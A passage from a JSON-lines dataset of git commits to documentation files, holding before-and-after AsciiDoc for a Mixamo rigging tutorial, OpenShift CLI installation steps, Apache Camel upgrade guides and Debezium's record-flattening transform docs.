scale of your model. If the button is selected, it will be dark in color.\n. Leave the `Forward` and `Up` axis at the default of `-Z Forward` and `Y Up`.\n. Under `Which kind of object to export` deselect everything but `Mesh`. \n. Under the `Geometries` tab, select `Apply Modifiers`.\n. When you are done, click the btn:[Export FBX] button to export the file.\n\n\n== Import\n\n\n.Mixamo\n. Create an link:https:\/\/www.mixamo.com\/[Mixamo] account and login.\n. Navigate to your `My Assets` directory.\n. Select `Upload`.\n. Navigate to the file to be uploaded or drag and drop it onto the file uploader.\n\n\n== Auto-Rigger\n\n\nIf everything went well the `Auto-Rigger` will open and your model will be facing you. If not, fix your model in Blender before proceeding. \n\n. If the model is facing you click btn:[Next].\n. In this panel you will rig your model. Place the markers as shown in the image. \n+\n[NOTE]\n====\nRemember that the model is facing you so its right is on your left.\n====\n\n. Select the LOD you are after. This is based off how many bones you want the hand of the model to have. Feel free to cycle through the options to see what each one does.\n. When you are through click the btn:[Next] button to rig your model.\n+\n[NOTE]\n====\nThis may take some time and if the model does not appear within 2 minutes something has went wrong and you will have to restart the upload process over. This is a trail blazing process so keep that in mind. 
\n====\n\nWhen the model appears, click through to the end of the process.\n\n\u3000\n== Download\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"4e7bed8a6649f86e53cb86879b3f0398408724d1","subject":"GitHub-32555: Updating location to download the CLI","message":"GitHub-32555: Updating location to download the CLI\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/cli-installing-cli.adoc","new_file":"modules\/cli-installing-cli.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * cli_reference\/openshift_cli\/getting-started.adoc\n\/\/ * installing\/installing_aws\/installing-aws-user-infra.adoc\n\/\/ * installing\/installing_aws\/installing-aws-customizations.adoc\n\/\/ * installing\/installing_aws\/installing-aws-default.adoc\n\/\/ * installing\/installing_aws\/installing-aws-government-region.adoc\n\/\/ * installing\/installing_aws\/installing-aws-network-customizations.adoc\n\/\/ * installing\/installing_aws\/installing-aws-private.adoc\n\/\/ * installing\/installing_aws\/installing-aws-vpc.adoc\n\/\/ * installing\/installing_aws\/installing-restricted-networks-aws-installer-provisioned.adoc\n\/\/ * installing\/installing_azure\/installing-azure-customizations.adoc\n\/\/ * installing\/installing_azure\/installing-azure-default.adoc\n\/\/ * installing\/installing_azure\/installing-azure-government-region.adoc\n\/\/ * installing\/installing_azure\/installing-azure-private.adoc\n\/\/ * installing\/installing_azure\/installing-azure-vnet.adoc\n\/\/ * installing\/installing_azure\/installing-azure-user-infra.adoc\n\/\/ * installing\/installing_bare_metal\/installing-bare-metal.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-customizations.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-private.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-default.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-vpc.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-user-infra.adoc\n\/\/ * installing\/installing_gcp\/installing-restricted-networks-gcp-installer-provisioned.adoc\n\/\/ * installing\/install_config\/installing-restricted-networks-preparations.adoc\n\/\/ * installing\/installing_vmc\/installing-vmc-user-infra.adoc\n\/\/ * installing\/installing_vmc\/installing-vmc.adoc\n\/\/ * installing\/installing_vmc\/installing-vmc-customizations.adoc\n\/\/ * installing\/installing_vmc\/installing-vmc-network-customizations.adoc\n\/\/ * installing\/installing_vmc\/installing-restricted-networks-vmc.adoc\n\/\/ * installing\/installing_vsphere\/installing-vsphere.adoc\n\/\/ * installing\/installing_vsphere\/installing-vsphere-installer-provisioned.adoc\n\/\/ * installing\/installing_vsphere\/installing-vsphere-installer-provisioned-customizations.adoc\n\/\/ * installing\/installing_vsphere\/installing-vsphere-installer-provisioned-network-customizations.adoc\n\/\/ * installing\/installing_vsphere\/installing-restricted-networks-installer-provisioned-vsphere.adoc\n\/\/ * installing\/installing_ibm_z\/installing-ibm-z.adoc\n\/\/ * openshift_images\/samples-operator-alt-registry.adoc\n\/\/ * installing\/installing_rhv\/installing-rhv-customizations.adoc\n\/\/ * installing\/installing_rhv\/installing-rhv-default.adoc\n\/\/ * updating\/updating-restricted-network-cluster.adoc\n\/\/\n\/\/ AMQ docs link to this; do not change anchor\n\nifeval::[\"{context}\" == 
\"updating-restricted-network-cluster\"]\n:restricted:\nendif::[]\n\n[id=\"cli-installing-cli_{context}\"]\n= Installing the OpenShift CLI by downloading the binary\n\nYou can install the OpenShift CLI (`oc`) to interact with {product-title} from a\ncommand-line interface. You can install `oc` on Linux, Windows, or macOS.\n\n[IMPORTANT]\n====\nIf you installed an earlier version of `oc`, you cannot use it to complete all\nof the commands in {product-title} {product-version}. Download and\ninstall the new version of `oc`.\nifdef::restricted[]\nIf you are upgrading a cluster in a restricted network, install the `oc` version that you plan to upgrade to.\nendif::restricted[]\n====\n\n[discrete]\n== Installing the OpenShift CLI on Linux\n\nYou can install the OpenShift CLI (`oc`) binary on Linux by using the following procedure.\n\n.Procedure\n\nifdef::openshift-origin[]\n. Navigate to https:\/\/mirror.openshift.com\/pub\/openshift-v4\/clients\/oc\/latest\/ and choose the folder for your operating system and architecture.\n. Download `oc.tar.gz`.\nendif::[]\nifndef::openshift-origin[]\n. Navigate to the link:https:\/\/access.redhat.com\/downloads\/content\/290[{product-title} downloads page] on the Red Hat Customer Portal.\n. Select the appropriate version in the *Version* drop-down menu.\n. Click *Download Now* next to the *OpenShift v{product-version} Linux Client* entry and save the file.\nendif::[]\n. Unpack the archive:\n+\n[source,terminal]\n----\n$ tar xvzf <file>\n----\n. Place the `oc` binary in a directory that is on your `PATH`.\n+\nTo check your `PATH`, execute the following command:\n+\n[source,terminal]\n----\n$ echo $PATH\n----\n\nAfter you install the OpenShift CLI, it is available using the `oc` command:\n\n[source,terminal]\n----\n$ oc <command>\n----\n\n[discrete]\n== Installing the OpenShift CLI on Windows\n\nYou can install the OpenShift CLI (`oc`) binary on Windows by using the following procedure.\n\n.Procedure\n\nifdef::openshift-origin[]\n. Navigate to https:\/\/mirror.openshift.com\/pub\/openshift-v4\/clients\/oc\/latest\/ and choose the folder for your operating system and architecture.\n. Download `oc.zip`.\nendif::[]\nifndef::openshift-origin[]\n. Navigate to the link:https:\/\/access.redhat.com\/downloads\/content\/290[{product-title} downloads page] on the Red Hat Customer Portal.\n. Select the appropriate version in the *Version* drop-down menu.\n. Click *Download Now* next to the *OpenShift v{product-version} Windows Client* entry and save the file.\nendif::[]\n. Unzip the archive with a ZIP program.\n. Move the `oc` binary to a directory that is on your `PATH`.\n+\nTo check your `PATH`, open the command prompt and execute the following command:\n+\n[source,terminal]\n----\nC:\\> path\n----\n\nAfter you install the OpenShift CLI, it is available using the `oc` command:\n\n[source,terminal]\n----\nC:\\> oc <command>\n----\n\n[discrete]\n== Installing the OpenShift CLI on macOS\n\nYou can install the OpenShift CLI (`oc`) binary on macOS by using the following procedure.\n\n.Procedure\n\nifdef::openshift-origin[]\n. Navigate to https:\/\/mirror.openshift.com\/pub\/openshift-v4\/clients\/oc\/latest\/ and choose the folder for your operating system and architecture.\n. Download `oc.tar.gz`.\nendif::[]\nifndef::openshift-origin[]\n. Navigate to the link:https:\/\/access.redhat.com\/downloads\/content\/290[{product-title} downloads page] on the Red Hat Customer Portal.\n. Select the appropriate version in the *Version* drop-down menu.\n. 
Click *Download Now* next to the *OpenShift v{product-version} MacOSX Client* entry and save the file.\nendif::[]\n. Unpack and unzip the archive.\n. Move the `oc` binary to a directory on your PATH.\n+\nTo check your `PATH`, open a terminal and execute the following command:\n+\n[source,terminal]\n----\n$ echo $PATH\n----\n\nAfter you install the OpenShift CLI, it is available using the `oc` command:\n\n[source,terminal]\n----\n$ oc <command>\n----\n\n\nifeval::[\"{context}\" == \"updating-restricted-network-cluster\"]\n:!restricted:\nendif::[]\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * cli_reference\/openshift_cli\/getting-started.adoc\n\/\/ * installing\/installing_aws\/installing-aws-user-infra.adoc\n\/\/ * installing\/installing_aws\/installing-aws-customizations.adoc\n\/\/ * installing\/installing_aws\/installing-aws-default.adoc\n\/\/ * installing\/installing_aws\/installing-aws-government-region.adoc\n\/\/ * installing\/installing_aws\/installing-aws-network-customizations.adoc\n\/\/ * installing\/installing_aws\/installing-aws-private.adoc\n\/\/ * installing\/installing_aws\/installing-aws-vpc.adoc\n\/\/ * installing\/installing_aws\/installing-restricted-networks-aws-installer-provisioned.adoc\n\/\/ * installing\/installing_azure\/installing-azure-customizations.adoc\n\/\/ * installing\/installing_azure\/installing-azure-default.adoc\n\/\/ * installing\/installing_azure\/installing-azure-government-region.adoc\n\/\/ * installing\/installing_azure\/installing-azure-private.adoc\n\/\/ * installing\/installing_azure\/installing-azure-vnet.adoc\n\/\/ * installing\/installing_azure\/installing-azure-user-infra.adoc\n\/\/ * installing\/installing_bare_metal\/installing-bare-metal.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-customizations.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-private.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-default.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-vpc.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-user-infra.adoc\n\/\/ * installing\/installing_gcp\/installing-restricted-networks-gcp-installer-provisioned.adoc\n\/\/ * installing\/install_config\/installing-restricted-networks-preparations.adoc\n\/\/ * installing\/installing_vmc\/installing-vmc-user-infra.adoc\n\/\/ * installing\/installing_vmc\/installing-vmc.adoc\n\/\/ * installing\/installing_vmc\/installing-vmc-customizations.adoc\n\/\/ * installing\/installing_vmc\/installing-vmc-network-customizations.adoc\n\/\/ * installing\/installing_vmc\/installing-restricted-networks-vmc.adoc\n\/\/ * installing\/installing_vsphere\/installing-vsphere.adoc\n\/\/ * installing\/installing_vsphere\/installing-vsphere-installer-provisioned.adoc\n\/\/ * installing\/installing_vsphere\/installing-vsphere-installer-provisioned-customizations.adoc\n\/\/ * installing\/installing_vsphere\/installing-vsphere-installer-provisioned-network-customizations.adoc\n\/\/ * installing\/installing_vsphere\/installing-restricted-networks-installer-provisioned-vsphere.adoc\n\/\/ * installing\/installing_ibm_z\/installing-ibm-z.adoc\n\/\/ * openshift_images\/samples-operator-alt-registry.adoc\n\/\/ * installing\/installing_rhv\/installing-rhv-customizations.adoc\n\/\/ * installing\/installing_rhv\/installing-rhv-default.adoc\n\/\/ * updating\/updating-restricted-network-cluster.adoc\n\/\/\n\/\/ AMQ docs link to this; do not change anchor\n\nifeval::[\"{context}\" == 
\"updating-restricted-network-cluster\"]\n:restricted:\nendif::[]\n\n[id=\"cli-installing-cli_{context}\"]\n= Installing the OpenShift CLI by downloading the binary\n\nYou can install the OpenShift CLI (`oc`) to interact with {product-title} from a\ncommand-line interface. You can install `oc` on Linux, Windows, or macOS.\n\n[IMPORTANT]\n====\nIf you installed an earlier version of `oc`, you cannot use it to complete all\nof the commands in {product-title} {product-version}. Download and\ninstall the new version of `oc`.\nifdef::restricted[]\nIf you are upgrading a cluster in a restricted network, install the `oc` version that you plan to upgrade to.\nendif::restricted[]\n====\n\n[discrete]\n== Installing the OpenShift CLI on Linux\n\nYou can install the OpenShift CLI (`oc`) binary on Linux by using the following procedure.\n\n.Procedure\n\nifdef::openshift-origin[]\n. Navigate to https:\/\/mirror.openshift.com\/pub\/openshift-v4\/clients\/oc\/latest\/ and choose the folder for your operating system and architecture.\n. Download `oc.tar.gz`.\nendif::[]\nifndef::openshift-origin[]\n. Navigate to the link:https:\/\/cloud.redhat.com\/openshift\/install[Infrastructure Provider] page on the {cloud-redhat-com} site.\n. Select your infrastructure provider, and, if applicable, your installation type.\n. In the *Command line interface* section, select *Linux* from the drop-down menu and click *Download command-line tools*.\nendif::[]\n. Unpack the archive:\n+\n[source,terminal]\n----\n$ tar xvzf <file>\n----\n. Place the `oc` binary in a directory that is on your `PATH`.\n+\nTo check your `PATH`, execute the following command:\n+\n[source,terminal]\n----\n$ echo $PATH\n----\n\nAfter you install the CLI, it is available using the `oc` command:\n\n[source,terminal]\n----\n$ oc <command>\n----\n\n[discrete]\n== Installing the OpenShift CLI on Windows\n\nYou can install the OpenShift CLI (`oc`) binary on Windows by using the following procedure.\n\n.Procedure\n\nifdef::openshift-origin[]\n. Navigate to https:\/\/mirror.openshift.com\/pub\/openshift-v4\/clients\/oc\/latest\/ and choose the folder for your operating system and architecture.\n. Download `oc.zip`.\nendif::[]\nifndef::openshift-origin[]\n. Navigate to the link:https:\/\/cloud.redhat.com\/openshift\/install[Infrastructure Provider] page on the {cloud-redhat-com} site.\n. Select your infrastructure provider, and, if applicable, your installation type.\n. In the *Command line interface* section, select *Windows* from the drop-down menu and click *Download command-line tools*.\nendif::[]\n. Unzip the archive with a ZIP program.\n. Move the `oc` binary to a directory that is on your `PATH`.\n+\nTo check your `PATH`, open the command prompt and execute the following command:\n+\n[source,terminal]\n----\nC:\\> path\n----\n\nAfter you install the CLI, it is available using the `oc` command:\n\n[source,terminal]\n----\nC:\\> oc <command>\n----\n\n[discrete]\n== Installing the OpenShift CLI on macOS\n\nYou can install the OpenShift CLI (`oc`) binary on macOS by using the following procedure.\n\n.Procedure\n\nifdef::openshift-origin[]\n. Navigate to https:\/\/mirror.openshift.com\/pub\/openshift-v4\/clients\/oc\/latest\/ and choose the folder for your operating system and architecture.\n. Download `oc.tar.gz`.\nendif::[]\nifndef::openshift-origin[]\n. Navigate to the link:https:\/\/cloud.redhat.com\/openshift\/install[Infrastructure Provider] page on the {cloud-redhat-com} site.\n. 
Select your infrastructure provider, and, if applicable, your installation type.\n. In the *Command line interface* section, select *MacOS* from the drop-down menu and click *Download command-line tools*.\nendif::[]\n. Unpack and unzip the archive.\n. Move the `oc` binary to a directory on your PATH.\n+\nTo check your `PATH`, open a terminal and execute the following command:\n+\n[source,terminal]\n----\n$ echo $PATH\n----\n\nAfter you install the CLI, it is available using the `oc` command:\n\n[source,terminal]\n----\n$ oc <command>\n----\n\n\nifeval::[\"{context}\" == \"updating-restricted-network-cluster\"]\n:!restricted:\nendif::[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4ebc15a9954942810136535628f77768ef684e26","subject":"CAMEL-18031: camel-karaf - Upgrade to 4.4.1","message":"CAMEL-18031: camel-karaf - Upgrade to 4.4.1\n","repos":"cunningt\/camel,tadayosi\/camel,christophd\/camel,tadayosi\/camel,tadayosi\/camel,christophd\/camel,christophd\/camel,cunningt\/camel,cunningt\/camel,tadayosi\/camel,tadayosi\/camel,apache\/camel,apache\/camel,apache\/camel,cunningt\/camel,apache\/camel,apache\/camel,cunningt\/camel,christophd\/camel,christophd\/camel,tadayosi\/camel,cunningt\/camel,apache\/camel,christophd\/camel","old_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-3x-upgrade-guide-3_19.adoc","new_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-3x-upgrade-guide-3_19.adoc","new_contents":"= Apache Camel 3.x Upgrade Guide\n\nThis document is for helping you upgrade your Apache Camel application\nfrom Camel 3.x to 3.y. For example, if you are upgrading Camel 3.0 to 3.2, then you should follow the guides\nfrom both 3.0 to 3.1 and 3.1 to 3.2.\n\n== Upgrading Camel 3.18 to 3.19\n\n=== camel-api\n\nAdded `addClassLoader` method to `org.apache.camel.spi.ClassResolver`.\n\nThe default TLS protocol is changed from `TLSv1.2` to `TLSv1.3` in Camel JSSE support.\n\n=== camel-ftp\n\nThe default TLS protocol is changed from `TLSv1.2` to `TLSv1.3`.\n\n=== camel-kafka\n\nUpdated the documentation to reflect that the default TLS protocol in Kafka Clients running on JDK11+\nis `TLSv1.2,TLSv1.3` (prefer v1.3 but can fall back to v1.2).\n\n=== camel-netty \/ camel-netty-http\n\nThe default TLS protocol is changed from `TLSv1,TLSv1.1,TLSv1.2` to `TLSv1.2,TLSv1.3`.\n\n=== camel-yaml-dsl\n\nRemoved using `template` as a custom alias for `routeTemplate` or `route-template`.\n\nRemoved the `tod` custom alias for `toD` or `to-d`.\n\nA route template can now also define a `route` which allows specifying route\noptions that otherwise are not possible when using `from`.\n\nFor example, you can now disable stream-caching, as shown in the snippet below that is from a Kamelet:\n\n[source,yaml]\n----\nspec:\n template:\n route:\n stream-caching: false\n message-history: true\n from:\n uri: timer:tick\n parameters:\n period: \"{{period}}\"\n steps:\n - set-body:\n constant: \"{{message}}\"\n - set-header:\n name: \"Content-Type\"\n constant: \"{{contentType}}\"\n - to: kamelet:sink\n----\n\n=== camel-salesforce\n\nThe URI format for consumer operations has changed. All consumer URIs now use the `subscribe` operation. E.g., `salesforce:subscribe:<topic_name>`, `salesforce:subscribe:event\/<event_name>`, `salesforce:subscribe:data\/ChangeEvents`.\n
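\nAs an illustration, a minimal Java DSL sketch of the new consumer form could look like this (the topic name and log line are invented for this sketch; only the new 3.19 style is shown, since the pre-3.19 form is not given here):\n\n[source,java]\n----\nfrom(\"salesforce:subscribe:CamelTestTopic\")\n    .log(\"Received change event: ${body}\");\n----\n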
\n=== camel-consul\n\nThe deprecated options were removed and should be replaced by the following options:\n\n|===\n|Deprecated |Replace with\n\n|`connectTimeoutMillis`\n|`connectTimeout`\n\n|`readTimeoutMillis`\n|`readTimeout`\n\n|`writeTimeoutMillis`\n|`writeTimeout`\n|===\n\n=== camel-google-bigquery-sql\n\nParameters in the form `@name` are extracted from the body or message and their type is preserved and translated into the corresponding `com.google.cloud.bigquery.StandardSQLTypeName`. See the https:\/\/cloud.google.com\/java\/docs\/reference\/google-cloud-bigquery\/latest\/com.google.cloud.bigquery.QueryParameterValue[documentation] for more information. (Conversion to StandardSQLTypeName.STRING was used for each type before.)\n\n\n=== camel-telegram\n\nThe component was migrated from the Async HTTP Client to the built-in HTTP client from Java 11 and newer. As such,\n* the parameter `clientConfig`, which received an `AsyncHTTPClientConfiguration` instance, was removed\n* the parameter `client`, which received an `AsyncHttpClient` instance, was modified to receive an `HttpClient` instance.\n\n\n=== xtokenize language\n\nThe xtokenize language has moved from `camel-xml-jaxp` to `camel-stax` JAR because\na StAX parser was needed anyway to use the language.\n\n\n=== camel-karaf\n\nUpgraded from Karaf 4.3.x to Karaf 4.4.x, which requires JDK11+.\n","old_contents":"= Apache Camel 3.x Upgrade Guide\n\nThis document is for helping you upgrade your Apache Camel application\nfrom Camel 3.x to 3.y. For example if you are upgrading Camel 3.0 to 3.2, then you should follow the guides\nfrom both 3.0 to 3.1 and 3.1 to 3.2.\n\n== Upgrading Camel 3.18 to 3.19\n\n=== camel-api\n\nAdded `addClassLoader` method to `org.apache.camel.spi.ClassResolver`.\n\nThe default TLS protocol is changed from `TLSv1.2` to `TLSv1.3` in Camel JSSE support.\n\n=== camel-ftp\n\nThe default TLS protocol is changed from `TLSv1.2` to `TLSv1.3`.\n\n=== camel-kafka\n\nUpdated the documentation to reflect the default TLS protocol in Kafka Clients running on JDK11+\nis `TLSv1.2,TLSv1.3` (prefer v1.3 but can fall back to v1.2).\n\n=== camel-netty \/ camel-netty-http\n\nThe default TLS protocol is changed from `TLSv1,TLSv1.1,TLSv1.2` to `TLSv1.2,TLSv1.3`.\n\n=== camel-yaml-dsl\n\nRemoved using `template` as a custom alias for `routeTemplate` or `route-template`.\n\nRemoved the `tod` custom alias for `toD` or `to-d`.\n\nA route template can now also define a `route` which allows specifying route\noptions that otherwise is not possible when using `from`.\n\nFor example, you can now disable stream-caching, as shown in the snippet below that are from a Kamelet:\n\n[source,yaml]\n----\nspec:\n template:\n route:\n stream-caching: false\n message-history: true\n from:\n uri: timer:tick\n parameters:\n period: \"{{period}}\"\n steps:\n - set-body:\n constant: \"{{message}}\"\n - set-header:\n name: \"Content-Type\"\n constant: \"{{contentType}}\"\n - to: kamelet:sink\n----\n\n=== camel-salesforce\n\nThe URI format for consumer operations has changed. All consumer URIs now use the `subscribe` operation. 
E.g., `salesforce:subscribe:<topic_name>`, `salesforce:subscribe:event\/<event_name>`, `salesforce:subscribe:data\/ChangeEvents`.\n\n=== camel-consul\n\nThe deprecated options were removed and should be replaced by the following options:\n\n|===\n|Deprecated |Replace with\n\n|`connectTimeoutMillis`\n|`connectTimeout`\n\n|`readTimeoutMillis`\n|`readTimeout`\n\n|`writeTimeoutMillis`\n|`writeTimeout`\n|===\n\n=== camel-google-bigquery-sql\n\nParameters in form of `@name` are extracted from the body or message and their type is preserved and translated into corresponding `com.google.cloud.bigquery.StandardSQLTypeName`. See the https:\/\/cloud.google.com\/java\/docs\/reference\/google-cloud-bigquery\/latest\/com.google.cloud.bigquery.QueryParameterValue[documentation] for more information. (Conversion to StandardSQLTypeName.STRING was used for each type before)\n\n\n=== camel-telegram\n\nThe component was migrated from the Async HTTP Client to the builtin HTTP client from Java 11 and newer. As such,\n* the parameter `clientConfig`, that received an `AsyncHTTPClientConfiguration` instance was removed\n* the parameter `client`, that received an `AsyncHttpClient` instance, was modified to receive a HTTPClient instance.\n\n\n=== xtokenize language\n\nThe xtokenize language has moved from `camel-xml-jaxp` to `camel-stax` JAR because\na stax parser was needed anyway to use the language.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"785cd13664bf995d250faa988066ad3a80934363","subject":"CAMEL-18665: camel-core: JsseParameters should use the camel provided resource loader instead of its own","message":"CAMEL-18665: camel-core: JsseParameters should use the camel provided resource loader instead of its own\n","repos":"apache\/camel,tadayosi\/camel,tadayosi\/camel,christophd\/camel,christophd\/camel,tadayosi\/camel,christophd\/camel,apache\/camel,tadayosi\/camel,apache\/camel,christophd\/camel,tadayosi\/camel,apache\/camel,christophd\/camel,apache\/camel,christophd\/camel,tadayosi\/camel,apache\/camel","old_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-3x-upgrade-guide-3_20.adoc","new_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-3x-upgrade-guide-3_20.adoc","new_contents":"= Apache Camel 3.x Upgrade Guide\n\nThis document is for helping you upgrade your Apache Camel application\nfrom Camel 3.x to 3.y. For example if you are upgrading Camel 3.0 to 3.2, then you should follow the guides\nfrom both 3.0 to 3.1 and 3.1 to 3.2.\n\n== Upgrading Camel 3.19 to 3.20\n\n=== camel-api\n\nThe `org.apache.camel.support.jsse.SSLContextParameters` is now using `ResourceLoader` from `CamelContext`\nto load keystore and other resources in a standard way. Therefore, the `SSLContextParameters` now must have been pre-configured\nwith a `CamelContext` otherwise an exception is thrown.\n\n=== camel-jsonpath\n\nThere is a new option `unpackArray` that unpacks a single-element Json array, matched by a Jsonpath, into an object. This option is disabled by default (this behaviour was enabled by default in previous Camel versions). There is a new expression `jsonpathUnpack(String text, Class<?> resultType)` that makes use of this new option.\n\n","old_contents":"= Apache Camel 3.x Upgrade Guide\n\nThis document is for helping you upgrade your Apache Camel application\nfrom Camel 3.x to 3.y. 
For example if you are upgrading Camel 3.0 to 3.2, then you should follow the guides\nfrom both 3.0 to 3.1 and 3.1 to 3.2.\n\n== Upgrading Camel 3.19 to 3.20\n\n=== camel-jsonpath\n\nThere is a new option `unpackArray` that unpacks a single-element Json array, matched by a Jsonpath, into an object. This option is disabled by default (this behaviour was enabled by default in previous Camel versions). There is a new expression `jsonpathUnpack(String text, Class<?> resultType)` that makes use of this new option.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"09b40c4bb3b9a5d935af62ff169886a23a5dd410","subject":"DBZ-1452 Fix typo","message":"DBZ-1452 Fix typo\n","repos":"debezium\/debezium,debezium\/debezium,debezium\/debezium,jpechane\/debezium,debezium\/debezium,jpechane\/debezium,jpechane\/debezium,jpechane\/debezium","old_file":"documentation\/modules\/ROOT\/pages\/configuration\/event-flattening.adoc","new_file":"documentation\/modules\/ROOT\/pages\/configuration\/event-flattening.adoc","new_contents":"= New Record State Extraction\ninclude::..\/_attributes.adoc[]\n:toc:\n:toc-placement: macro\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\ntoc::[]\n\n[NOTE]\n====\nThis SMT is supported only for the SQL database connectors; it does not work with the MongoDB connector.\nSee xref:configuration\/mongodb-event-flattening.adoc[here] for the MongoDB equivalent to this SMT.\n====\n\nDebezium generates data change events in the form of a complex message structure.\nEach event consists of three parts:\n\n* metadata, comprising the type of operation, information on the event source, a timestamp, and optionally transaction information\n* the row data before change\n* the row data after change\n\nE.g. the general message structure for an `update` change looks like this:\n\n[source,json,indent=0]\n----\n{\n\t\"op\": \"u\",\n\t\"source\": {\n\t\t...\n\t},\n\t\"ts_ms\" : \"...\",\n\t\"before\" : {\n\t\t\"field1\" : \"oldvalue1\",\n\t\t\"field2\" : \"oldvalue2\"\n\t},\n\t\"after\" : {\n\t\t\"field1\" : \"newvalue1\",\n\t\t\"field2\" : \"newvalue2\"\n\t}\n}\n----\n\nMore details about the message structure are provided in xref:connectors\/index.adoc[the documentation for each connector].\n\nThis format allows the user to get most information about changes happening in the system.\nThe downside of using the complex format is that other connectors or other parts of the Kafka ecosystem usually expect the data in a simple message format that can generally be described like so:\n\n[source,json,indent=0]\n----\n{\n\t\"field1\" : \"newvalue1\",\n\t\"field2\" : \"newvalue2\"\n}\n----\n\nDebezium provides https:\/\/kafka.apache.org\/documentation\/#connect_transforms[a single message transformation] that crosses the bridge between the complex and simple formats, the https:\/\/github.com\/debezium\/debezium\/blob\/master\/debezium-core\/src\/main\/java\/io\/debezium\/transforms\/ExtractNewRecordState.java[ExtractNewRecordState] SMT.\n\nThe SMT provides four main functions.\nIt\n\n* extracts the `after` field from change events and replaces the original event just with this part\n* optionally filters delete and tombstone records, as per the capabilities and requirements of downstream consumers\n* optionally adds metadata fields from the change event to the outgoing flattened record\n* optionally adds metadata fields to the header\n\nThe SMT can be applied either to a source connector (Debezium) or a sink connector.\nWe generally recommend applying the 
transformation on the sink side as it means that the messages stored in Apache Kafka will contain the whole context.\nThe final decision depends on use case for each user.\n\n== Configuration\nThe configuration is a part of source\/sink task connector and is expressed in a set of properties:\n\n[source]\n----\ntransforms=unwrap,...\ntransforms.unwrap.type=io.debezium.transforms.ExtractNewRecordState\ntransforms.unwrap.drop.tombstones=false\ntransforms.unwrap.delete.handling.mode=rewrite\ntransforms.unwrap.add.source.fields=table,lsn\n----\n\n=== Record filtering for delete records\n\nThe SMT provides a special handling for events that signal a `delete` operation.\nWhen a `DELETE` is executed on a datasource then Debezium generates two events:\n\n* a record with `d` operation that contains only old row data\n* (optionally) a record with `null` value and the same key (a \"tombstone\" message). This record serves as a marker for Apache Kafka that all messages with this key can be removed from the topic during https:\/\/kafka.apache.org\/documentation\/#compaction[log compaction].\n\nUpon processing these two records, the SMT can pass on the `d` record as is,\nconvert it into another tombstone record or drop it.\nThe original tombstone message can be passed on as is or also be dropped.\n\n[NOTE]\n====\nThe SMT by default filters out *both* delete records as widely used sink connectors do not support handling of tombstone messages at this point.\n====\n\n=== Adding metadata fields to the message\n\nThe SMT can optionally add metadata fields from the original change event to the final flattened record. This functionality can be used to add things like the operation or the table from the change event, or connector-specific fields like the Postgres LSN field. For more information on what's available see xref:connectors\/index.adoc[the documentation for each connector].\n\nIn case of duplicate field names (e.g. \"ts_ms\" exists twice), the struct should be specified to get the correct field (e.g. \"source.ts_ms\"). The fields will be prefixed with \"\\\\__\" or \"__<struct>_\", depending on the specification of the struct. Please use a comma separated list without spaces.\n\nFor example, the configuration\n\n----\ntransforms=unwrap,...\ntransforms.unwrap.type=io.debezium.transforms.ExtractNewRecordState\ntransforms.unwrap.add.fields=op,table,lsn,source.ts_ms\n----\n\nwill add\n\n----\n{ \"__op\" : \"c\", __table\": \"MY_TABLE\", \"__lsn\": \"123456789\", \"__source_ts_ms\" : \"123456789\", ...}\n----\n\nto the final flattened record.\n\nFor `DELETE` events, this option is only supported when the `delete.handling.mode` option is set to \"rewrite\".\n\n=== Adding metadata fields to the header\n\nThe SMT can optionally add metadata fields from the original change event to the header of the final flattened record. This functionality can be used to add things like the operation or the table from the change event, or connector-specific fields like the Postgres LSN field. For more information on what's available see xref:connectors\/index.adoc[the documentation for each connector].\n\nIn case of duplicate field names (e.g. \"ts_ms\" exists twice), the struct should be specified to get the correct field (e.g. \"source.ts_ms\"). The fields will be prefixed with \"\\\\__\" or \"__<struct>_\", depending on the specification of the struct. 
Please use a comma separated list without spaces.\n\nFor example, the configuration\n\n----\ntransforms=unwrap,...\ntransforms.unwrap.type=io.debezium.transforms.ExtractNewRecordState\ntransforms.unwrap.add.headers=op,table,lsn,source.ts_ms\n----\n\nwill add headers `__op`, `__table`, `__lsn` and `__source_ts_ms` to the outgoing record.\n\n=== Determine original operation [DEPRECATED]\n\n_The `operation.header` option is deprecated and scheduled for removal. Please use add.headers instead. If both add.headers and operation.header are specified, the latter will be ignored._\n\nWhen a message is flattened, the final result won't show whether it was an insert, update or first read\n(deletions can be detected via tombstones or rewrites, see link:#configuration_options[Configuration options]).\n\nTo solve this problem, Debezium offers an option to propagate the original operation via a header added to the message.\nTo enable this feature, the option `operation.header` must be set to `true`.\n\n[source]\n----\ntransforms=unwrap,...\ntransforms.unwrap.type=io.debezium.transforms.ExtractNewRecordState\ntransforms.unwrap.operation.header=true\n----\n\nThe possible values are the ones from the `op` field of the original change event.\n\n=== Adding source metadata fields [DEPRECATED]\n\n_The `add.source.fields` option is deprecated and scheduled for removal. Please use add.fields instead. If both add.fields and add.source.fields are specified, the latter will be ignored._\n\nThe SMT can optionally add metadata fields from the original change event's `source` structure to the final flattened record (prefixed with \"__\"). This functionality can be used to add things like the table from the change event, or connector-specific fields like the Postgres LSN field. For more information on what's available in the source structure see xref:connectors\/index.adoc[the documentation for each connector].\n\nFor example, the 